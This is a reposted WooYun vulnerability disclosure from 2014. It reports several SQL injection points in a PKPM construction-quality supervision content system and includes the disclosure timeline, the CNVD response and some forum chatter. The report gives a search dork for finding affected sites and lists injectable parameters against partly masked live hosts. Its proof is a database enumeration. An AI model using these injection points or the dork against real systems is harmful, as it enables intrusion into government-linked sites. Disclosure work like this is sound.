某建设工程质量监督系统存在多处SQL注入<全为sa>

admin
admin
admin
105013
文章
87
评论
2015年4月30日10:29:37评论293 views字数 236阅读0分47秒阅读模式
摘要

2014-07-16: 细节已通知厂商并且等待厂商处理中
2014-07-19: 厂商已经确认,细节仅向厂商公开
2014-07-22: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2014-09-12: 细节向核心白帽子及相关领域专家公开
2014-09-22: 细节向普通白帽子公开
2014-10-02: 细节向实习白帽子公开
2014-10-12: 细节向公众公开

漏洞概要 关注数(11) 关注此漏洞

缺陷编号: WooYun-2014-68262

漏洞标题: 某建设工程质量监督系统存在多处SQL注入<全为sa> 某建设工程质量监督系统存在多处SQL注入&lt;全为sa&gt;

相关厂商: 国家互联网应急中心

漏洞作者: 路人甲

提交时间: 2014-07-16 11:06

公开时间: 2014-10-12 11:08

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 18

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

1人收藏

漏洞详情

披露状态:

2014-07-16: 细节已通知厂商并且等待厂商处理中
2014-07-19: 厂商已经确认,细节仅向厂商公开
2014-07-22: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2014-09-12: 细节向核心白帽子及相关领域专家公开
2014-09-22: 细节向普通白帽子公开
2014-10-02: 细节向实习白帽子公开
2014-10-12: 细节向公众公开

简要描述:

@疯狗 第一次提交通用的,注入漏洞打包集合求首页啦!

详细说明:

#1.由PKPM【http://**.**.**.**/】,公司开发的专用于工程监督的内容管理系统存在多个注入漏洞,可以这么说:到处都是注射漏洞啊!前人也有提交过,不过前人提交的只是单纯的一个注射漏洞,这里提交不重复多个注入漏洞吧:

code 区域 
关键字:https://wen.lu/search?biw=1024&bih=663&noj=1&q=inurl%3AInfoValue.aspx%3Fid%3D&oq=inurl%3AInfoValue.aspx%3Fid%3D&gs_l=serp.3...5914.8010.0.8**.**.**.**.**.**.**.**.1203.0j6j1.7.0....0...1c.1j4.48.serp..8.0.0.-CfJcmMLbm0
code 区域 
前人提交涉及的注射点:InfoValue.aspx?id=

#2.注入点集合:

code 区域 
①:YZGC.aspx?key=
 ②:JGBA.aspx?key=&qtype=WH
 ③:InfoList.aspx?ClassId=
 ④:ImageLinkPage.aspx?id=
 ⑤:InfoList.aspx?keyword
 ⑥:YZGCDetails.aspx?id=

漏洞证明:

#3.注射漏洞证明【以下仅供证明,切勿非法用途,后果自负】:

code 区域 
注射点①:
 http://www.***.com/YZGC.aspx?key=
 http://**.**.**.**/YZGC.aspx?key=
 http://221.8.***.69/YZGC.aspx?key=
 http://www.***.com/YZGC.aspx?key=

某建设工程质量监督系统存在多处SQL注入<全为sa>

某建设工程质量监督系统存在多处SQL注入<全为sa>

code 区域 
注射点②:
 http://www.***.com/JGBA.aspx?key=a&qtype=WH
 http://www.***.com/JGBA.aspx?key=a&qtype=WH
 http://**.**.**.**/JGBA.aspx?key=a&qtype=WH

某建设工程质量监督系统存在多处SQL注入<全为sa>

某建设工程质量监督系统存在多处SQL注入<全为sa>

code 区域 
注射点③
 http://www.***.com/InfoList.aspx?ClassId=6
 http://www.***.cn/InfoList.aspx?ClassId=18
 http://www.h***.cn/InfoList.aspx?ClassId=1
 http://218.7.***.170:81/InfoList.aspx?ClassId=7
 http://www.f*****.**.**.**/InfoList.aspx?ClassId=2

某建设工程质量监督系统存在多处SQL注入<全为sa>

某建设工程质量监督系统存在多处SQL注入<全为sa>

code 区域 
注射点④:
 http://www.*****.**.**.**/ImageLinkPage.aspx?id=22
 http://sys67.*****.**.**.**:81/ImageLinkPage.aspx?id=4
 http://www.hr*****.**.**.**/imagelinkpage.aspx?id=34
 http://www.h***.cn/ImageLinkPage.aspx?id=1
 http://sys67.*****.**.**.**:81/ImageLinkPage.aspx?id=1

某建设工程质量监督系统存在多处SQL注入<全为sa>

某建设工程质量监督系统存在多处SQL注入<全为sa>

code 区域 
注射点⑤
 http://www.*****.**.**.**/InfoList.aspx?keyword=a
 http://www.c*****.**.**.**/InfoList.aspx?keyword=a
 http://www.t*****.**.**.**/InfoList.aspx?keyword=a
 http://www.hr*****.**.**.**/InfoList.aspx?keyword=a
 http://218.7.***.170:81/InfoList.aspx?keyword=a

某建设工程质量监督系统存在多处SQL注入<全为sa>

某建设工程质量监督系统存在多处SQL注入<全为sa>

第六个就不证明了,最后证明一下可跑出数据,这里仅列出库名为依据,勿深入!

某建设工程质量监督系统存在多处SQL注入<全为sa>

code 区域 
available databases [13]:
 [*] 201211errtest
 [*] ASPState
 [*] bakweb
 [*] heb1234
 [*] lumigent
 [*] master
 [*] model
 [*] msdb
 [*] pkpmbsjd(heb)
 [*] PKPMWEB(HEBJZXH)
 [*] tempdb
 [*] testhebweb
 [*] testhebwebdb

修复方案:

code 区域 
修复与上报漏洞:
 厂商网站:http://**.**.**.**/
 联系厂商:电话: 010-84282839 传真: 84276106 E-mail: pub@**.**.**.**
 按照多个漏洞评分,rank 20

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-07-19 11:20

厂商回复:

CNVD确认并复现所述情况,暂未建立与软件生产厂商的联系渠道,根据测试实例,已经转由CNCERT下发给吉林、湖南、黑龙江、广西等分中心,协 调处置地方单位案例。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2014-07-14 12:17 | 雷锋 ( 路人 | Rank:12 漏洞数:2 | 看人生万般无奈,看世间千姿百态...)

    0

    syjlzx.com有这个么???

  2. 2014-07-15 21:35 | 泳少 ( 普通白帽子 | Rank:257 漏洞数:84 | ★ 梦想这条路踏上了,跪着也要...)

    0

    碉堡了?路人甲不来领钱吗?

  3. 2014-07-16 17:31 | 贫道来自河北 ( 普通白帽子 | Rank:1469 漏洞数:439 | 一个立志要把乌云集市变成零食店的男人)

    0

    @疯狗 说好审我漏洞的呢 求审/bugs/wooyun-2014-068203/trace/fd9a185f2be2b6d28ffd9859843d3351 /bugs/wooyun-2014-068032/trace/e07abc3bf7076e529cdb0231ae8a6a27

  4. 2014-07-16 17:38 | U神 ( 核心白帽子 | Rank:1375 漏洞数:152 | 乌云核心菜鸟,此号处于联盟托管中....)

    1

    @贫道来自河北 看完你的漏洞我就知道你是库带的老衲来自河北

  5. 2014-07-16 17:44 | 贫道来自河北 ( 普通白帽子 | Rank:1469 漏洞数:439 | 一个立志要把乌云集市变成零食店的男人)

    0

    @U神 老衲来自河是我师父

  6. 2014-07-16 17:45 | U神 ( 核心白帽子 | Rank:1375 漏洞数:152 | 乌云核心菜鸟,此号处于联盟托管中....)

    0

    @贫道来自河北 感觉第二个漏洞…………你懂得

  7. 2014-07-16 17:45 | 贫道来自河北 ( 普通白帽子 | Rank:1469 漏洞数:439 | 一个立志要把乌云集市变成零食店的男人)

    0

    @U神 库带收集漏洞要求太高,表示小菜玩不了

  8. 2014-07-16 17:48 | 贫道来自河北 ( 普通白帽子 | Rank:1469 漏洞数:439 | 一个立志要把乌云集市变成零食店的男人)

    0

    @U神 那个编辑器的还是我告老衲来自河北

  9. 2014-07-16 17:49 | U神 ( 核心白帽子 | Rank:1375 漏洞数:152 | 乌云核心菜鸟,此号处于联盟托管中....)

    0

    @贫道来自河北 http://loudong.360.cn/vul/info/id/4721 这个?

  10. 2014-07-16 17:51 | 贫道来自河北 ( 普通白帽子 | Rank:1469 漏洞数:439 | 一个立志要把乌云集市变成零食店的男人)

    0

    @U神 是的不过我那个里面是20个他只找到15个

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin